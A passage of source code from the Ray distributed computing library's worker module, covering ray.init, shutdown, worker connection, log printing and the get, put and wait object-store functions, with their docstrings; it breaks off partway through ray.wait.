_metrics_export_port=None,
_system_config=None,
_tracing_startup_hook=None):
"""
Connect to an existing Ray cluster or start one and connect to it.
This method handles two cases; either a Ray cluster already exists and we
just attach this driver to it or we start all of the processes associated
with a Ray cluster and attach to the newly started cluster.
To start Ray and all of the relevant processes, use this as follows:
.. code-block:: python
ray.init()
To connect to an existing Ray cluster, use this as follows (substituting
in the appropriate address):
.. code-block:: python
ray.init(address="123.45.67.89:6379")
You can also define an environment variable called `RAY_ADDRESS` in
the same format as the `address` parameter to connect to an existing
cluster with ray.init() or ray.init(address="auto").
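    For illustration, a minimal sketch of starting a local cluster with
    explicit resource limits (the numbers below are placeholder values):
    .. code-block:: python
        ray.init(num_cpus=4, num_gpus=1)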
Args:
address (str): The address of the Ray cluster to connect to. If
this address is not provided, then this command will start Redis,
a raylet, a plasma store, a plasma manager, and some workers.
It will also kill these processes when Python exits. If the driver
is running on a node in a Ray cluster, using `auto` as the value
            tells the driver to detect the cluster, removing the need to
specify a specific node address. If the environment variable
`RAY_ADDRESS` is defined and the address is None or "auto", Ray
will set `address` to `RAY_ADDRESS`.
num_cpus (int): Number of CPUs the user wishes to assign to each
raylet. By default, this is set based on virtual cores.
num_gpus (int): Number of GPUs the user wishes to assign to each
raylet. By default, this is set based on detected GPUs.
        resources: A dictionary mapping the names of custom resources to the
            quantities of those resources available.
object_store_memory: The amount of memory (in bytes) to start the
object store with. By default, this is automatically set based on
available system memory.
local_mode (bool): If true, the code will be executed serially. This
is useful for debugging.
ignore_reinit_error: If true, Ray suppresses errors from calling
ray.init() a second time. Ray won't be restarted.
include_dashboard: Boolean flag indicating whether or not to start the
Ray dashboard, which displays the status of the Ray
cluster. If this argument is None, then the UI will be started if
the relevant dependencies are present.
dashboard_host: The host to bind the dashboard server to. Can either be
localhost (127.0.0.1) or 0.0.0.0 (available from all interfaces).
By default, this is set to localhost to prevent access from
external machines.
dashboard_port(int, None): The port to bind the dashboard server to.
Defaults to 8265 and Ray will automatically find a free port if
8265 is not available.
job_config (ray.job_config.JobConfig): The job configuration.
configure_logging: True (default) if configuration of logging is
allowed here. Otherwise, the user may want to configure it
separately.
logging_level: Logging level, defaults to logging.INFO. Ignored unless
"configure_logging" is true.
logging_format: Logging format, defaults to string containing a
timestamp, filename, line number, and message. See the source file
ray_constants.py for details. Ignored unless "configure_logging"
is true.
log_to_driver (bool): If true, the output from all of the worker
processes on all nodes will be directed to the driver.
_enable_object_reconstruction (bool): If True, when an object stored in
the distributed plasma store is lost due to node failure, Ray will
attempt to reconstruct the object by re-executing the task that
created the object. Arguments to the task will be recursively
reconstructed. If False, then ray.ObjectLostError will be
thrown.
_redis_max_memory: Redis max memory.
_plasma_directory: Override the plasma mmap file directory.
_node_ip_address (str): The IP address of the node that we are on.
_driver_object_store_memory (int): Limit the amount of memory the
driver can use in the object store for creating objects.
_memory: Amount of reservable memory resource to create.
_redis_password (str): Prevents external clients without the password
from connecting to Redis if provided.
_temp_dir (str): If provided, specifies the root temporary
directory for the Ray process. Defaults to an OS-specific
conventional location, e.g., "/tmp/ray".
        _metrics_export_port(int): Port on which Ray exposes system metrics
            through a Prometheus endpoint. It is currently under active
development, and the API is subject to change.
_system_config (dict): Configuration for overriding
RayConfig defaults. For testing purposes ONLY.
_tracing_startup_hook (str): If provided, turns on and sets up tracing
for Ray. Must be the name of a function that takes no arguments and
sets up a Tracer Provider, Remote Span Processors, and
(optional) additional instruments. See more at
docs.ray.io/tracing.html. It is currently under active development,
and the API is subject to change.
Returns:
Address information about the started processes.
Raises:
Exception: An exception is raised if an inappropriate combination of
arguments is passed in.
"""
# Try to increase the file descriptor limit, which is too low by
# default for Ray: https://github.com/ray-project/ray/issues/11239
try:
import resource
soft, hard = resource.getrlimit(resource.RLIMIT_NOFILE)
if soft < hard:
# https://github.com/ray-project/ray/issues/12059
soft = max(soft, min(hard, 65536))
logger.debug("Automatically increasing RLIMIT_NOFILE to max "
"value of {}".format(hard))
try:
resource.setrlimit(resource.RLIMIT_NOFILE, (soft, hard))
except ValueError:
logger.debug("Failed to raise limit.")
soft, _ = resource.getrlimit(resource.RLIMIT_NOFILE)
if soft < 4096:
logger.warning(
"File descriptor limit {} is too low for production "
"servers and may result in connection errors. "
"At least 8192 is recommended. --- "
"Fix with 'ulimit -n 8192'".format(soft))
except ImportError:
logger.debug("Could not import resource module (on Windows)")
pass
if "RAY_ADDRESS" in os.environ:
if address is None or address == "auto":
address = os.environ["RAY_ADDRESS"]
# Convert hostnames to numerical IP address.
if _node_ip_address is not None:
node_ip_address = services.address_to_ip(_node_ip_address)
raylet_ip_address = node_ip_address
if address:
redis_address, _, _ = services.validate_redis_address(address)
else:
redis_address = None
if configure_logging:
setup_logger(logging_level, logging_format)
if redis_address is not None:
logger.info(
f"Connecting to existing Ray cluster at address: {redis_address}")
if local_mode:
driver_mode = LOCAL_MODE
else:
driver_mode = SCRIPT_MODE
if global_worker.connected:
if ignore_reinit_error:
logger.info(
"Calling ray.init() again after it has already been called.")
return
else:
raise RuntimeError("Maybe you called ray.init twice by accident? "
"This error can be suppressed by passing in "
"'ignore_reinit_error=True' or by calling "
"'ray.shutdown()' prior to 'ray.init()'.")
_system_config = _system_config or {}
if not isinstance(_system_config, dict):
raise TypeError("The _system_config must be a dict.")
global _global_node
if redis_address is None:
# In this case, we need to start a new cluster.
ray_params = ray._private.parameter.RayParams(
redis_address=redis_address,
node_ip_address=node_ip_address,
raylet_ip_address=raylet_ip_address,
object_ref_seed=None,
driver_mode=driver_mode,
redirect_worker_output=None,
redirect_output=None,
num_cpus=num_cpus,
num_gpus=num_gpus,
resources=resources,
num_redis_shards=None,
redis_max_clients=None,
redis_password=_redis_password,
plasma_directory=_plasma_directory,
huge_pages=None,
include_dashboard=include_dashboard,
dashboard_host=dashboard_host,
dashboard_port=dashboard_port,
memory=_memory,
object_store_memory=object_store_memory,
redis_max_memory=_redis_max_memory,
plasma_store_socket_name=None,
temp_dir=_temp_dir,
            # We need to disable this if the runtime env is not set.
            # Uploading happens after the core worker is created, and we
            # should prevent the default workers from being created before
            # uploading.
            # TODO (yic): Have a separate connection to the GCS client once
            # Redis removal is done. The uploading should happen before this
            # one.
start_initial_python_workers_for_first_job=(
job_config is None or job_config.runtime_env is None),
_system_config=_system_config,
lru_evict=_lru_evict,
enable_object_reconstruction=_enable_object_reconstruction,
metrics_export_port=_metrics_export_port,
tracing_startup_hook=_tracing_startup_hook)
# Start the Ray processes. We set shutdown_at_exit=False because we
# shutdown the node in the ray.shutdown call that happens in the atexit
# handler. We still spawn a reaper process in case the atexit handler
# isn't called.
_global_node = ray.node.Node(
head=True,
shutdown_at_exit=False,
spawn_reaper=True,
ray_params=ray_params)
else:
# In this case, we are connecting to an existing cluster.
if num_cpus is not None or num_gpus is not None:
raise ValueError(
"When connecting to an existing cluster, num_cpus "
"and num_gpus must not be provided.")
if resources is not None:
raise ValueError("When connecting to an existing cluster, "
"resources must not be provided.")
if object_store_memory is not None:
raise ValueError("When connecting to an existing cluster, "
"object_store_memory must not be provided.")
if _system_config is not None and len(_system_config) != 0:
raise ValueError("When connecting to an existing cluster, "
"_system_config must not be provided.")
if _enable_object_reconstruction:
raise ValueError(
"When connecting to an existing cluster, "
"_enable_object_reconstruction must not be provided.")
# In this case, we only need to connect the node.
ray_params = ray._private.parameter.RayParams(
node_ip_address=node_ip_address,
raylet_ip_address=raylet_ip_address,
redis_address=redis_address,
redis_password=_redis_password,
object_ref_seed=None,
temp_dir=_temp_dir,
_system_config=_system_config,
lru_evict=_lru_evict,
enable_object_reconstruction=_enable_object_reconstruction,
metrics_export_port=_metrics_export_port)
_global_node = ray.node.Node(
ray_params,
head=False,
shutdown_at_exit=False,
spawn_reaper=False,
connect_only=True)
if driver_mode == SCRIPT_MODE and job_config:
        # Rewrite the URIs. Note the package isn't uploaded to the URI until
        # later, in connect().
runtime_env.rewrite_runtime_env_uris(job_config)
connect(
_global_node,
mode=driver_mode,
log_to_driver=log_to_driver,
worker=global_worker,
driver_object_store_memory=_driver_object_store_memory,
job_id=None,
namespace=namespace,
job_config=job_config)
if job_config and job_config.code_search_path:
global_worker.set_load_code_from_local(True)
else:
# Because `ray.shutdown()` doesn't reset this flag, for multiple
# sessions in one process, the 2nd `ray.init()` will reuse the
# flag of last session. For example:
# ray.init(load_code_from_local=True)
# ray.shutdown()
# ray.init()
# # Here the flag `load_code_from_local` is still True if we
        # # didn't have this `else` branch.
# ray.shutdown()
global_worker.set_load_code_from_local(False)
for hook in _post_init_hooks:
hook()
node_id = global_worker.core_worker.get_current_node_id()
return dict(_global_node.address_info, node_id=node_id.hex())
# Functions to run as callback after a successful ray init.
_post_init_hooks = []
@client_mode_hook
def shutdown(_exiting_interpreter=False):
"""Disconnect the worker, and terminate processes started by ray.init().
This will automatically run at the end when a Python process that uses Ray
exits. It is ok to run this twice in a row. The primary use case for this
function is to cleanup state between tests.
Note that this will clear any remote function definitions, actor
definitions, and existing actors, so if you wish to use any previously
defined remote functions or actors after calling ray.shutdown(), then you
need to redefine them. If they were defined in an imported module, then you
will need to reload the module.
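    For illustration, a minimal sketch of the between-tests cleanup pattern
    described above:
    .. code-block:: python
        ray.init()
        # ... run some tasks or actors ...
        ray.shutdown()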
Args:
_exiting_interpreter (bool): True if this is called by the atexit hook
and false otherwise. If we are exiting the interpreter, we will
wait a little while to print any extra error messages.
"""
if _exiting_interpreter and global_worker.mode == SCRIPT_MODE:
# This is a duration to sleep before shutting down everything in order
# to make sure that log messages finish printing.
time.sleep(0.5)
disconnect(_exiting_interpreter)
# We need to destruct the core worker here because after this function,
# we will tear down any processes spawned by ray.init() and the background
# IO thread in the core worker doesn't currently handle that gracefully.
if hasattr(global_worker, "gcs_client"):
del global_worker.gcs_client
if hasattr(global_worker, "core_worker"):
del global_worker.core_worker
# Disconnect global state from GCS.
ray.state.state.disconnect()
# Shut down the Ray processes.
global _global_node
if _global_node is not None:
if _global_node.is_head():
_global_node.destroy_external_storage()
_global_node.kill_all_processes(check_alive=False, allow_graceful=True)
_global_node = None
# TODO(rkn): Instead of manually resetting some of the worker fields, we
# should simply set "global_worker" to equal "None" or something like that.
global_worker.set_mode(None)
atexit.register(shutdown, True)
# TODO(edoakes): this should only be set in the driver.
def sigterm_handler(signum, frame):
sys.exit(signum)
try:
ray._private.utils.set_sigterm_handler(sigterm_handler)
except ValueError:
logger.warning("Failed to set SIGTERM handler, processes might"
"not be cleaned up properly on exit.")
# Define a custom excepthook so that if the driver exits with an exception, we
# can push that exception to Redis.
normal_excepthook = sys.excepthook
def custom_excepthook(type, value, tb):
# If this is a driver, push the exception to GCS worker table.
if global_worker.mode == SCRIPT_MODE and hasattr(global_worker,
"worker_id"):
error_message = "".join(traceback.format_tb(tb))
worker_id = global_worker.worker_id
worker_type = ray.gcs_utils.DRIVER
worker_info = {"exception": error_message}
ray.state.state._check_connected()
ray.state.state.add_worker(worker_id, worker_type, worker_info)
# Call the normal excepthook.
normal_excepthook(type, value, tb)
sys.excepthook = custom_excepthook
def print_to_stdstream(data):
print_file = sys.stderr if data["is_err"] else sys.stdout
print_worker_logs(data, print_file)
# Start time of this process, used for relative time logs.
t0 = time.time()
autoscaler_log_fyi_printed = False
def filter_autoscaler_events(lines: List[str]) -> Iterator[str]:
"""Given raw log lines from the monitor, return only autoscaler events.
Autoscaler events are denoted by the ":event_summary:" magic token.
"""
global autoscaler_log_fyi_printed
if not AUTOSCALER_EVENTS:
return
# Print out autoscaler events only, ignoring other messages.
for line in lines:
if ":event_summary:" in line:
if not autoscaler_log_fyi_printed:
yield ("Tip: use `ray status` to view detailed "
"autoscaling status. To disable autoscaler event "
"messages, you can set AUTOSCALER_EVENTS=0.")
autoscaler_log_fyi_printed = True
# The event text immediately follows the ":event_summary:"
# magic token.
yield line.split(":event_summary:")[1]
def time_string() -> str:
"""Return the relative time from the start of this job.
For example, 15m30s.
"""
delta = time.time() - t0
hours = 0
minutes = 0
while delta > 3600:
hours += 1
delta -= 3600
while delta > 60:
minutes += 1
delta -= 60
output = ""
if hours:
output += "{}h".format(hours)
if minutes:
output += "{}m".format(minutes)
output += "{}s".format(int(delta))
return output
def print_worker_logs(data: Dict[str, str], print_file: Any):
def prefix_for(data: Dict[str, str]) -> str:
"""The PID prefix for this log line."""
if data["pid"] in ["autoscaler", "raylet"]:
return ""
else:
return "pid="
def color_for(data: Dict[str, str]) -> str:
"""The color for this log line."""
if data["pid"] == "raylet":
return colorama.Fore.YELLOW
elif data["pid"] == "autoscaler":
return colorama.Style.BRIGHT + colorama.Fore.CYAN
else:
return colorama.Fore.CYAN
if data["pid"] == "autoscaler":
pid = "{} +{}".format(data["pid"], time_string())
lines = filter_autoscaler_events(data["lines"])
else:
pid = data["pid"]
lines = data["lines"]
if data["ip"] == data["localhost"]:
for line in lines:
print(
"{}{}({}{}){} {}".format(colorama.Style.DIM, color_for(data),
prefix_for(data), pid,
colorama.Style.RESET_ALL, line),
file=print_file)
else:
for line in lines:
print(
"{}{}({}{}, ip={}){} {}".format(
colorama.Style.DIM, color_for(data), prefix_for(data), pid,
data["ip"], colorama.Style.RESET_ALL, line),
file=print_file)
def listen_error_messages_raylet(worker, threads_stopped):
"""Listen to error messages in the background on the driver.
This runs in a separate thread on the driver and pushes (error, time)
tuples to the output queue.
Args:
worker: The worker class that this thread belongs to.
threads_stopped (threading.Event): A threading event used to signal to
the thread that it should exit.
"""
worker.error_message_pubsub_client = worker.redis_client.pubsub(
ignore_subscribe_messages=True)
# Exports that are published after the call to
# error_message_pubsub_client.subscribe and before the call to
# error_message_pubsub_client.listen will still be processed in the loop.
# Really we should just subscribe to the errors for this specific job.
# However, currently all errors seem to be published on the same channel.
error_pubsub_channel = ray.gcs_utils.RAY_ERROR_PUBSUB_PATTERN
worker.error_message_pubsub_client.psubscribe(error_pubsub_channel)
try:
if _internal_kv_initialized():
# Get any autoscaler errors that occurred before the call to
# subscribe.
error_message = _internal_kv_get(DEBUG_AUTOSCALING_ERROR)
if error_message is not None:
logger.warning(error_message.decode())
while True:
# Exit if we received a signal that we should stop.
if threads_stopped.is_set():
return
msg = worker.error_message_pubsub_client.get_message()
if msg is None:
threads_stopped.wait(timeout=0.01)
continue
pubsub_msg = ray.gcs_utils.PubSubMessage.FromString(msg["data"])
error_data = ray.gcs_utils.ErrorTableData.FromString(
pubsub_msg.data)
job_id = error_data.job_id
if job_id not in [
worker.current_job_id.binary(),
JobID.nil().binary(),
]:
continue
error_message = error_data.error_message
if (error_data.type == ray_constants.TASK_PUSH_ERROR):
# TODO(ekl) remove task push errors entirely now that we have
# the separate unhandled exception handler.
pass
else:
logger.warning(error_message)
except (OSError, redis.exceptions.ConnectionError) as e:
logger.error(f"listen_error_messages_raylet: {e}")
finally:
# Close the pubsub client to avoid leaking file descriptors.
worker.error_message_pubsub_client.close()
@client_mode_hook
def is_initialized():
"""Check if ray.init has been called yet.
Returns:
True if ray.init has already been called and false otherwise.
"""
return ray.worker.global_worker.connected
def connect(node,
mode=WORKER_MODE,
log_to_driver=False,
worker=global_worker,
driver_object_store_memory=None,
job_id=None,
namespace=None,
job_config=None,
runtime_env_hash=0):
"""Connect this worker to the raylet, to Plasma, and to Redis.
Args:
node (ray.node.Node): The node to connect.
mode: The mode of the worker. One of SCRIPT_MODE, WORKER_MODE, and
LOCAL_MODE.
log_to_driver (bool): If true, then output from all of the worker
processes on all nodes will be directed to the driver.
worker: The ray.Worker instance.
driver_object_store_memory: Limit the amount of memory the driver can
use in the object store when creating objects.
job_id: The ID of job. If it's None, then we will generate one.
job_config (ray.job_config.JobConfig): The job configuration.
runtime_env_hash (int): The hash of the runtime env for this worker.
"""
# Do some basic checking to make sure we didn't call ray.init twice.
error_message = "Perhaps you called ray.init twice by accident?"
assert not worker.connected, error_message
assert worker.cached_functions_to_run is not None, error_message
# Enable nice stack traces on SIGSEGV etc.
try:
if not faulthandler.is_enabled():
faulthandler.enable(all_threads=False)
except io.UnsupportedOperation:
pass # ignore
# Create a Redis client to primary.
# The Redis client can safely be shared between threads. However,
# that is not true of Redis pubsub clients. See the documentation at
# https://github.com/andymccurdy/redis-py#thread-safety.
worker.redis_client = node.create_redis_client()
# Initialize some fields.
if mode in (WORKER_MODE, RESTORE_WORKER_MODE, SPILL_WORKER_MODE,
UTIL_WORKER_MODE):
# We should not specify the job_id if it's `WORKER_MODE`.
assert job_id is None
job_id = JobID.nil()
# TODO(qwang): Rename this to `worker_id_str` or type to `WorkerID`
worker.worker_id = _random_string()
else:
# This is the code path of driver mode.
if job_id is None:
# TODO(qwang): use `GcsClient::GenerateJobId()` here.
job_id = JobID.from_int(
int(worker.redis_client.incr("JobCounter")))
# When tasks are executed on remote workers in the context of multiple
# drivers, the current job ID is used to keep track of which job is
# responsible for the task so that error messages will be propagated to
# the correct driver.
worker.worker_id = ray._private.utils.compute_driver_id_from_job(
job_id).binary()
if mode is not SCRIPT_MODE and mode is not LOCAL_MODE and setproctitle:
process_name = ray_constants.WORKER_PROCESS_TYPE_IDLE_WORKER
if mode is SPILL_WORKER_MODE:
process_name = (
ray_constants.WORKER_PROCESS_TYPE_SPILL_WORKER_IDLE)
elif mode is RESTORE_WORKER_MODE:
process_name = (
ray_constants.WORKER_PROCESS_TYPE_RESTORE_WORKER_IDLE)
setproctitle.setproctitle(process_name)
if not isinstance(job_id, JobID):
raise TypeError("The type of given job id must be JobID.")
# All workers start out as non-actors. A worker can be turned into an actor
# after it is created.
worker.node = node
worker.set_mode(mode)
    # For drivers, check that the version information matches the version
# information that the Ray cluster was started with.
try:
ray._private.services.check_version_info(worker.redis_client)
except Exception as e:
if mode == SCRIPT_MODE:
raise e
elif mode == WORKER_MODE:
traceback_str = traceback.format_exc()
ray._private.utils.push_error_to_driver_through_redis(
worker.redis_client,
ray_constants.VERSION_MISMATCH_PUSH_ERROR,
traceback_str,
job_id=None)
worker.lock = threading.RLock()
driver_name = ""
log_stdout_file_path = ""
log_stderr_file_path = ""
if mode == SCRIPT_MODE:
import __main__ as main
driver_name = (main.__file__
if hasattr(main, "__file__") else "INTERACTIVE MODE")
elif not LOCAL_MODE:
raise ValueError(
"Invalid worker mode. Expected DRIVER, WORKER or LOCAL.")
redis_address, redis_port = node.redis_address.split(":")
gcs_options = ray._raylet.GcsClientOptions(
redis_address,
int(redis_port),
node.redis_password,
)
if job_config is None:
job_config = ray.job_config.JobConfig()
if namespace is not None:
# The namespace field of job config may have already been set in code
# paths such as the client.
job_config.set_ray_namespace(namespace)
serialized_job_config = job_config.serialize()
worker.core_worker = ray._raylet.CoreWorker(
mode, node.plasma_store_socket_name, node.raylet_socket_name, job_id,
gcs_options, node.get_logs_dir_path(), node.node_ip_address,
node.node_manager_port, node.raylet_ip_address, (mode == LOCAL_MODE),
driver_name, log_stdout_file_path, log_stderr_file_path,
serialized_job_config, node.metrics_agent_port, runtime_env_hash)
worker.gcs_client = worker.core_worker.get_gcs_client()
# Create an object for interfacing with the global state.
    # Note, global state should be initialized after `CoreWorker`, because it
    # will use glog, which is initialized in `CoreWorker`.
ray.state.state._initialize_global_state(
node.redis_address, redis_password=node.redis_password)
# If it's a driver and it's not coming from ray client, we'll prepare the
    # environment here. If it's ray client, the environment will be prepared
    # on the server side.
if mode == SCRIPT_MODE and not job_config.client_job:
runtime_env.upload_runtime_env_package_if_needed(job_config)
elif mode == WORKER_MODE:
# TODO(ekl) get rid of the env var hack and get runtime env from the
# task spec and/or job config only.
uris = os.environ.get("RAY_RUNTIME_ENV_FILES")
uris = [uris] if uris else \
worker.core_worker.get_job_config().runtime_env.uris
working_dir = runtime_env.ensure_runtime_env_setup(uris)
if working_dir is not None:
os.chdir(working_dir)
# Notify raylet that the core worker is ready.
worker.core_worker.notify_raylet()
if driver_object_store_memory is not None:
worker.core_worker.set_object_store_client_options(
f"ray_driver_{os.getpid()}", driver_object_store_memory)
# Start the import thread
if mode not in (RESTORE_WORKER_MODE, SPILL_WORKER_MODE, UTIL_WORKER_MODE):
worker.import_thread = import_thread.ImportThread(
worker, mode, worker.threads_stopped)
worker.import_thread.start()
# If this is a driver running in SCRIPT_MODE, start a thread to print error
# messages asynchronously in the background. Ideally the scheduler would
# push messages to the driver's worker service, but we ran into bugs when
# trying to properly shutdown the driver's worker service, so we are
# temporarily using this implementation which constantly queries the
# scheduler for new error messages.
if mode == SCRIPT_MODE:
worker.listener_thread = threading.Thread(
target=listen_error_messages_raylet,
name="ray_listen_error_messages",
args=(worker, worker.threads_stopped))
worker.listener_thread.daemon = True
worker.listener_thread.start()
if log_to_driver:
global_worker_stdstream_dispatcher.add_handler(
"ray_print_logs", print_to_stdstream)
worker.logger_thread = threading.Thread(
target=worker.print_logs, name="ray_print_logs")
worker.logger_thread.daemon = True
worker.logger_thread.start()
if mode == SCRIPT_MODE:
# Add the directory containing the script that is running to the Python
# paths of the workers. Also add the current directory. Note that this
# assumes that the directory structures on the machines in the clusters
# are the same.
# In client mode, if we use runtime env, then it'll be taken care of
# automatically.
script_directory = os.path.abspath(os.path.dirname(sys.argv[0]))
worker.run_function_on_all_workers(
lambda worker_info: sys.path.insert(1, script_directory))
if not job_config.client_job and len(
job_config.get_runtime_env_uris()) == 0:
current_directory = os.path.abspath(os.path.curdir)
worker.run_function_on_all_workers(
lambda worker_info: sys.path.insert(1, current_directory))
# TODO(rkn): Here we first export functions to run, then remote
# functions. The order matters. For example, one of the functions to
# run may set the Python path, which is needed to import a module used
# to define a remote function. We may want to change the order to
# simply be the order in which the exports were defined on the driver.
# In addition, we will need to retain the ability to decide what the
# first few exports are (mostly to set the Python path). Additionally,
# note that the first exports to be defined on the driver will be the
# ones defined in separate modules that are imported by the driver.
# Export cached functions_to_run.
for function in worker.cached_functions_to_run:
worker.run_function_on_all_workers(function)
worker.cached_functions_to_run = None
# Setup tracing here
if _internal_kv_get("tracing_startup_hook"):
ray.util.tracing.tracing_helper._global_is_tracing_enabled = True
if not getattr(ray, "__traced__", False):
_setup_tracing = import_from_string(
_internal_kv_get("tracing_startup_hook").decode("utf-8"))
_setup_tracing()
ray.__traced__ = True
def disconnect(exiting_interpreter=False):
"""Disconnect this worker from the raylet and object store."""
# Reset the list of cached remote functions and actors so that if more
# remote functions or actors are defined and then connect is called again,
# the remote functions will be exported. This is mostly relevant for the
# tests.
worker = global_worker
if worker.connected:
# Shutdown all of the threads that we've started. TODO(rkn): This
# should be handled cleanly in the worker object's destructor and not
# in this disconnect method.
worker.threads_stopped.set()
if hasattr(worker, "import_thread"):
worker.import_thread.join_import_thread()
if hasattr(worker, "listener_thread"):
worker.listener_thread.join()
if hasattr(worker, "logger_thread"):
worker.logger_thread.join()
worker.threads_stopped.clear()
worker._session_index += 1
global_worker_stdstream_dispatcher.remove_handler("ray_print_logs")
worker.node = None # Disconnect the worker from the node.
worker.cached_functions_to_run = []
worker.serialization_context_map.clear()
try:
ray_actor = ray.actor
except AttributeError:
ray_actor = None # This can occur during program termination
if ray_actor is not None:
ray_actor.ActorClassMethodMetadata.reset_cache()
@contextmanager
def _changeproctitle(title, next_title):
if _mode() is not LOCAL_MODE:
setproctitle.setproctitle(title)
try:
yield
finally:
if _mode() is not LOCAL_MODE:
setproctitle.setproctitle(next_title)
def show_in_dashboard(message, key="", dtype="text"):
"""Display message in dashboard.
Display message for the current task or actor in the dashboard.
For example, this can be used to display the status of a long-running
computation.
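    For illustration, a minimal sketch (the message and key below are
    placeholder values):
    .. code-block:: python
        @ray.remote
        def long_job():
            ray.worker.show_in_dashboard("50% done", key="progress")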
Args:
message (str): Message to be displayed.
        key (str): The key name for the message. Multiple messages under
different keys will be displayed at the same time. Messages
under the same key will be overridden.
        dtype (str): The type of message for rendering. One of the
following: text, html.
"""
worker = global_worker
worker.check_connected()
acceptable_dtypes = {"text", "html"}
assert dtype in acceptable_dtypes, (
f"dtype accepts only: {acceptable_dtypes}")
message_wrapped = {"message": message, "dtype": dtype}
message_encoded = json.dumps(message_wrapped).encode()
worker.core_worker.set_webui_display(key.encode(), message_encoded)
# Global variable to make sure we only send out the warning once.
blocking_get_inside_async_warned = False
@client_mode_hook
def get(object_refs, *, timeout=None):
"""Get a remote object or a list of remote objects from the object store.
This method blocks until the object corresponding to the object ref is
available in the local object store. If this object is not in the local
object store, it will be shipped from an object store that has it (once the
object has been created). If object_refs is a list, then the objects
corresponding to each object in the list will be returned.
    This method will issue a warning if it's running inside an async context;
    you can use ``await object_ref`` instead of ``ray.get(object_ref)``. For
a list of object refs, you can use ``await asyncio.gather(*object_refs)``.
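    For illustration, a minimal sketch (assuming Ray has been initialized):
    .. code-block:: python
        @ray.remote
        def f(x):
            return x + 1
        ref = f.remote(1)
        assert ray.get(ref) == 2
        assert ray.get([f.remote(i) for i in range(3)]) == [1, 2, 3]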
Args:
object_refs: Object ref of the object to get or a list of object refs
to get.
timeout (Optional[float]): The maximum amount of time in seconds to
wait before returning.
Returns:
A Python object or a list of Python objects.
Raises:
GetTimeoutError: A GetTimeoutError is raised if a timeout is set and
the get takes longer than timeout to return.
Exception: An exception is raised if the task that created the object
or that created one of the objects raised an exception.
"""
worker = global_worker
worker.check_connected()
if hasattr(
worker,
"core_worker") and worker.core_worker.current_actor_is_asyncio():
global blocking_get_inside_async_warned
if not blocking_get_inside_async_warned:
logger.warning("Using blocking ray.get inside async actor. "
"This blocks the event loop. Please use `await` "
"on object ref with asyncio.gather if you want to "
"yield execution to the event loop instead.")
blocking_get_inside_async_warned = True
with profiling.profile("ray.get"):
is_individual_id = isinstance(object_refs, ray.ObjectRef)
if is_individual_id:
object_refs = [object_refs]
if not isinstance(object_refs, list):
raise ValueError("'object_refs' must either be an object ref "
"or a list of object refs.")
# TODO(ujvl): Consider how to allow user to retrieve the ready objects.
values, debugger_breakpoint = worker.get_objects(
object_refs, timeout=timeout)
for i, value in enumerate(values):
if isinstance(value, RayError):
if isinstance(value, ray.exceptions.ObjectLostError):
worker.core_worker.dump_object_store_memory_usage()
if isinstance(value, RayTaskError):
raise value.as_instanceof_cause()
else:
raise value
if is_individual_id:
values = values[0]
if debugger_breakpoint != b"":
frame = sys._getframe().f_back
rdb = ray.util.pdb.connect_ray_pdb(
None, None, False, None,
debugger_breakpoint.decode() if debugger_breakpoint else None)
rdb.set_trace(frame=frame)
return values
@client_mode_hook
def put(value):
"""Store an object in the object store.
The object may not be evicted while a reference to the returned ID exists.
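    For illustration, a minimal sketch (assuming Ray has been initialized):
    .. code-block:: python
        obj_ref = ray.put([1, 2, 3])
        assert ray.get(obj_ref) == [1, 2, 3]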
Args:
value: The Python object to be stored.
Returns:
The object ref assigned to this value.
"""
worker = global_worker
worker.check_connected()
with profiling.profile("ray.put"):
try:
object_ref = worker.put_object(value)
except ObjectStoreFullError:
logger.info(
"Put failed since the value was either too large or the "
"store was full of pinned objects.")
raise
return object_ref
# Global variable to make sure we only send out the warning once.
blocking_wait_inside_async_warned = False
@client_mode_hook
def wait(object_refs, *, num_returns=1, timeout=None, fetch_local=True):
"""Return a list of IDs that are ready and a list of IDs that are not.
If timeout is set, the function returns either when the requested number of
IDs are ready or when the timeout is reached, whichever occurs first. If it
is not set, the function simply waits until that number of objects is ready
and returns that exact number of object refs.
This method returns two lists. The first list consists of object refs that
correspond to objects that are available in the object store. The second
list corresponds to the rest of the object refs (which may or may not be
ready).
Ordering of the input list of object refs is preserved. That is, if A
precedes B in the input list, and both are in the ready list, then A will
precede B in the ready list. This also holds true if A and B are both in
the remaining list.
This method will issue a warning if it's running inside an async context.
Instead of ``ray.wait(object_refs)``, you can use
``await asyncio.wait(object_refs)``.
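    For illustration, a minimal sketch (assuming Ray has been initialized;
    the timeout below is a placeholder value):
    .. code-block:: python
        @ray.remote
        def slow(i):
            return i
        refs = [slow.remote(i) for i in range(4)]
        ready, not_ready = ray.wait(refs, num_returns=2, timeout=10.0)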
Args:
object_refs (List[ObjectRef]): List of object refs for objects that may
or may not be ready. Note that these IDs must be unique.
num_returns (int): The number of object refs that should be returned.
timeout (float): The maximum amount of time in seconds to wait before
returning.
fetch_local (bool): If True, wait for the object to be downloaded onto
the local node before returning it as ready. If False, ray.wait()
will not trigger fetching of objects to the local node and will
return immediately once the object is available anywhere in the
cluster.
Returns:
A list of object refs that are ready and a list of the remaining object
IDs.
"""
worker = global_worker
worker.check_connected()
if hasattr(worker,
"core_worker") and worker.core_worker.current_actor_is_asyncio(
) and timeout != 0:
global blocking_wait_inside_async_warned
if not blocking_wait_inside_async_warned:
logger.debug("Using blocking ray.wait inside async method. "
"This blocks the event loop. Please use `await` "
"on object ref with asyncio.wait. ")
blocking_wait_inside_async_warned = True
if isinstance(object_refs, ObjectRef):
raise TypeError(
"wait() expected a list of ray.ObjectRef, got a single "
"ray.ObjectRef")
if not isinstance(object_refs, list):
raise TypeError("wait() expected a list of ray.ObjectRef, "
f"got {type(object_refs)}")
if timeout is not None and timeout < 0:
raise ValueError("The 'timeout' argument must be nonnegative. "
f"Received {timeout}")
for object_ref in object_refs:
if not isinstance(object_ref, ObjectRef):
raise TypeError("wait() expected a list of ray.ObjectRef, "
f"got list containing {type(object_ref)}")
worker.check_connected()
# TODO(swang): Check main thread.
with profiling.profile("ray.wait"):
# TODO(rkn): This is a temporary workaround for
# https://github.com/ray-project/ray/issues/997. However, it should be
# fixed in Arrow instead of here.
if len(object_refs) == 0:
return [], []
if len(object_refs) != len(set(object_refs)):
raise ValueError("Wait requires a list of unique object refs.")
if num_returns <= 0:
raise ValueError(
"Invalid number of objects to return %d." % num_returns)
if num_returns > len(object_refs):
raise ValueError("num_returns cannot be greater than the number "
"of objects provided to ray.wait.")
timeout = timeout if timeout is not None else 10**6
timeout_milliseconds = int(timeout * 1000)
ready_ids, remaining_ids = worker.core_worker.wait(
object_refs,
num_returns,
timeout_milliseconds,
worker.current_task_id,
